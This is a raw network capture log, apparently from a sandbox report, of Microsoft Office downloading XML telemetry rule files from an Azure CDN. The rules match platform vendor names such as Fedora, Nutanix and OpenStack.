2024-11-07 03:13:07 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:07 GMT Content-Type: text/xml Content-Length: 479 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B989EE75B" x-ms-request-id: f5f9e784-f01e-0071-765c-2e431c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031307Z-15869dbbcc6x4rp4hC1DFW3t7w00000008cg00000000h626 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:07 UTC	479	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
56	192.168.2.4	49812	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:07 UTC	192	OUT	GET /rules/rule120651v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:07 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:07 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT ETag: "0x8DC582BA80D96A1" x-ms-request-id: 8dd7d181-c01e-0066-495f-2ea1ec000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031307Z-15869dbbcc6j87jfhC1DFWky3s00000008tg000000001ar0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:07 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
57	192.168.2.4	49810	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:07 UTC	192	OUT	GET /rules/rule120649v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:07 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:07 GMT Content-Type: text/xml Content-Length: 416 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT ETag: "0x8DC582BAEA4B445" x-ms-request-id: 1e70bdcb-401e-0029-2301-2d9b43000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031307Z-16547b76f7fr4g8xhC1DFW9cqc00000006p000000000pt8g x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:07 UTC	416	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr

Session ID	Source IP	Source Port	Destination IP	Destination Port
58	192.168.2.4	49813	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:07 UTC	192	OUT	GET /rules/rule120652v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:07 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:07 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT ETag: "0x8DC582B97E6FCDD" x-ms-request-id: a4ba0423-501e-0029-6446-2cd0b8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031307Z-16547b76f7f2g4rlhC1DFWnx8800000007fg00000000a1s5 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:07 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
59	192.168.2.4	49814	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:07 UTC	192	OUT	GET /rules/rule120653v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:07 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:07 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT ETag: "0x8DC582B9C710B28" x-ms-request-id: d07841a0-401e-0064-490f-2d54af000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031307Z-16547b76f7f76p6chC1DFWctqw00000007rg000000004hh2 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:07 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
60	192.168.2.4	49816	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:07 UTC	192	OUT	GET /rules/rule120654v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:08 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:07 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT ETag: "0x8DC582BA54DCC28" x-ms-request-id: 4a1cb9ec-a01e-0021-5a00-2d814c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031307Z-16547b76f7frbg6bhC1DFWr54000000007e000000000gv63 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:08 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
61	192.168.2.4	49818	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:07 UTC	192	OUT	GET /rules/rule120656v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:08 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:07 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT ETag: "0x8DC582BA48B5BDD" x-ms-request-id: 6538f966-101e-00a2-58f1-2c9f2e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031307Z-16547b76f7fxdzxghC1DFWmf7n00000007ng00000000dy2d x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:08 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
62	192.168.2.4	49817	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:07 UTC	192	OUT	GET /rules/rule120655v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:08 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:07 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT ETag: "0x8DC582BB7F164C3" x-ms-request-id: cd5b73c9-701e-0098-1e09-2d395f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031307Z-16547b76f7fknvdnhC1DFWxnys00000007ng000000006pf7 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-07 03:13:08 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
63	192.168.2.4	49819	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:07 UTC	192	OUT	GET /rules/rule120657v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:08 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:08 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT ETag: "0x8DC582B9FF95F80" x-ms-request-id: 4c0fb41f-801e-00ac-7b5f-2efd65000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031308Z-17df447cdb5t94hvhC1DFWw97800000003y000000000e08x x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:08 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
64	192.168.2.4	49820	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:08 UTC	192	OUT	GET /rules/rule120658v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:08 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:08 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT ETag: "0x8DC582BB650C2EC" x-ms-request-id: e6dbc9be-001e-0017-395c-2e0c3c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031308Z-15869dbbcc6lq2lzhC1DFWym6c00000002n000000000gy8d x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-07 03:13:08 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
65	192.168.2.4	49822	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:08 UTC	192	OUT	GET /rules/rule120659v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:08 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:08 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3EAF226" x-ms-request-id: 06fd63be-801e-008f-5e01-2d2c5d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031308Z-16547b76f7fwvr5dhC1DFW2c9400000007g0000000007dgu x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-07 03:13:08 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I

Session ID	Source IP	Source Port	Destination IP	Destination Port
66	192.168.2.4	49823	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:08 UTC	192	OUT	GET /rules/rule120660v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:08 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:08 GMT Content-Type: text/xml Content-Length: 485 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT ETag: "0x8DC582BB9769355" x-ms-request-id: 4c090a89-b01e-0098-3360-2ecead000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031308Z-15869dbbcc6zbpm7hC1DFW75xg00000000rg00000000m6v8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-07 03:13:08 UTC	485	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" 